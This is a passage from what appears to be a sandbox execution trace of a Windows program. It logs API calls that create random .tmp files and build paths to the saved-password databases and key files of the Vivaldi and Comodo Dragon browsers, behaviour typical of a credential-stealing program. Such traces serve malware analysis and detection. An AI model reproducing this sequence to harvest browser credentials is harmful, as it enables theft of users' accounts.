AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.415] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.415] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.415] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="dtDaJax" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dtDaJax") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dtDaJax" [0203.415] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.415] lstrlenW (lpString=".tmp") returned 4 [0203.415] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.416] lstrlenW (lpString=".tmp") returned 4 [0203.416] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.416] lstrlenW (lpString=".tmp") returned 4 [0203.416] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dtDaJax") returned 53 [0203.416] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.416] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.416] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.416] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dtDaJax", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dtDaJax.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dtDaJax.tmp" [0203.416] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.416] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.417] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.417] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.417] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.417] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.417] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.417] lstrlenW (lpString="\\Vivaldi\\User Data\\Default\\Login Data") returned 37 [0203.417] VirtualAlloc (lpAddress=0x0, dwSize=0x4c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.418] lstrlenW (lpString="\\Vivaldi\\User Data\\Default\\Login Data") returned 37 [0203.418] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Vivaldi\\User Data\\Default\\Login Data" | out: lpString1="\\Vivaldi\\User Data\\Default\\Login Data") returned="\\Vivaldi\\User Data\\Default\\Login Data" [0203.418] lstrlenW (lpString="\\Vivaldi\\User Data\\Default\\Login Data") returned 37 [0203.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.418] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.418] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.418] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.418] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Vivaldi\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data" [0203.418] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.419] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.419] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.419] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.419] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.419] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.419] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.419] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.419] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.419] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.420] lstrlenW (lpString="\\Vivaldi\\User Data\\Local State") returned 30 [0203.420] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.420] lstrlenW (lpString="\\Vivaldi\\User Data\\Local State") returned 30 [0203.420] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Vivaldi\\User Data\\Local State" | out: lpString1="\\Vivaldi\\User Data\\Local State") returned="\\Vivaldi\\User Data\\Local State" [0203.420] lstrlenW (lpString="\\Vivaldi\\User Data\\Local State") returned 30 [0203.420] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.420] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.420] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.420] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.420] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Vivaldi\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Vivaldi\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Vivaldi\\User Data\\Local State" [0203.420] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.421] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0203.421] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.421] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.421] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.422] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.422] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.422] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.422] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.422] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.422] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.422] lstrlenW (lpString="\\") returned 1 [0203.422] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.422] lstrlenW (lpString="\\") returned 1 [0203.422] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.423] lstrlenW (lpString="\\") returned 1 [0203.423] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.423] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.423] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.423] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.423] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.423] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.423] GetProcessHeap () returned 0x900000 [0203.423] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.423] lstrlenA (lpString="Aqjjdva") returned 7 [0203.423] lstrlenA (lpString="Aqjjdva") returned 7 [0203.423] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.424] lstrcpyA (in: lpString1=0x2d80000, lpString2="Aqjjdva" | out: lpString1="Aqjjdva") returned="Aqjjdva" [0203.424] lstrlenA (lpString="Aqjjdva") returned 7 [0203.424] lstrlenA (lpString="Aqjjdva") returned 7 [0203.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.424] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.426] lstrlenA (lpString="Aqjjdva") returned 7 [0203.426] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="Aqjjdva") returned 8 [0203.426] lstrlenW (lpString="Aqjjdva") returned 7 [0203.426] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.426] lstrlenW (lpString="Aqjjdva") returned 7 [0203.426] lstrcpyW (in: lpString1=0x2df0000, lpString2="Aqjjdva" | out: lpString1="Aqjjdva") returned="Aqjjdva" [0203.426] lstrlenW (lpString="Aqjjdva") returned 7 [0203.426] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.426] lstrcpyW (in: lpString1=0x2e20000, lpString2="Aqjjdva" | out: lpString1="Aqjjdva") returned="Aqjjdva" [0203.426] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.427] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.427] lstrlenW (lpString="Aqjjdva") returned 7 [0203.427] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.427] lstrcatW (in: lpString1="", lpString2="Aqjjdva" | out: lpString1="Aqjjdva") returned="Aqjjdva" [0203.427] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.427] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.428] GetProcessHeap () returned 0x900000 [0203.428] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.428] lstrlenW (lpString="Aqjjdva") returned 7 [0203.428] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.428] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.428] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.428] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.428] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Aqjjdva" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Aqjjdva") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Aqjjdva" [0203.428] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.429] lstrlenW (lpString=".tmp") returned 4 [0203.429] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.429] lstrlenW (lpString=".tmp") returned 4 [0203.429] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.429] lstrlenW (lpString=".tmp") returned 4 [0203.429] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Aqjjdva") returned 53 [0203.429] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.429] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.429] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.429] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Aqjjdva", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Aqjjdva.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Aqjjdva.tmp" [0203.429] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.430] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.430] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.430] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.430] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.430] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.430] lstrlenW (lpString="\\") returned 1 [0203.430] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.430] lstrlenW (lpString="\\") returned 1 [0203.430] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.430] lstrlenW (lpString="\\") returned 1 [0203.430] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.431] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.431] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.431] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.431] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.431] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.431] GetProcessHeap () returned 0x900000 [0203.431] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.431] lstrlenA (lpString="wFaKzxq") returned 7 [0203.431] lstrlenA (lpString="wFaKzxq") returned 7 [0203.431] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.432] lstrcpyA (in: lpString1=0x2d80000, lpString2="wFaKzxq" | out: lpString1="wFaKzxq") returned="wFaKzxq" [0203.432] lstrlenA (lpString="wFaKzxq") returned 7 [0203.432] lstrlenA (lpString="wFaKzxq") returned 7 [0203.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.432] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.432] lstrlenA (lpString="wFaKzxq") returned 7 [0203.432] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="wFaKzxq") returned 8 [0203.432] lstrlenW (lpString="wFaKzxq") returned 7 [0203.432] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.432] lstrlenW (lpString="wFaKzxq") returned 7 [0203.432] lstrcpyW (in: lpString1=0x2e20000, lpString2="wFaKzxq" | out: lpString1="wFaKzxq") returned="wFaKzxq" [0203.432] lstrlenW (lpString="wFaKzxq") returned 7 [0203.432] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.433] lstrcpyW (in: lpString1=0x2eb0000, lpString2="wFaKzxq" | out: lpString1="wFaKzxq") returned="wFaKzxq" [0203.433] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.433] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.433] lstrlenW (lpString="wFaKzxq") returned 7 [0203.433] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.433] lstrcatW (in: lpString1="", lpString2="wFaKzxq" | out: lpString1="wFaKzxq") returned="wFaKzxq" [0203.434] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.434] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.434] GetProcessHeap () returned 0x900000 [0203.434] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.434] lstrlenW (lpString="wFaKzxq") returned 7 [0203.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.434] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.434] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.434] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.435] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="wFaKzxq" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wFaKzxq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wFaKzxq" [0203.435] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.435] lstrlenW (lpString=".tmp") returned 4 [0203.435] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.435] lstrlenW (lpString=".tmp") returned 4 [0203.435] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.435] lstrlenW (lpString=".tmp") returned 4 [0203.435] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wFaKzxq") returned 53 [0203.435] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.435] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.436] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wFaKzxq", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wFaKzxq.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wFaKzxq.tmp" [0203.436] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.436] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.436] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.436] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.436] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.437] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.437] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.437] lstrlenW (lpString="\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 43 [0203.437] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.437] lstrlenW (lpString="\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 43 [0203.437] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Comodo\\Dragon\\User Data\\Default\\Login Data" | out: lpString1="\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned="\\Comodo\\Dragon\\User Data\\Default\\Login Data" [0203.437] lstrlenW (lpString="\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 43 [0203.437] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.437] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.437] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.438] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.438] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Comodo\\Dragon\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data" [0203.438] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.438] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.438] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.438] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") 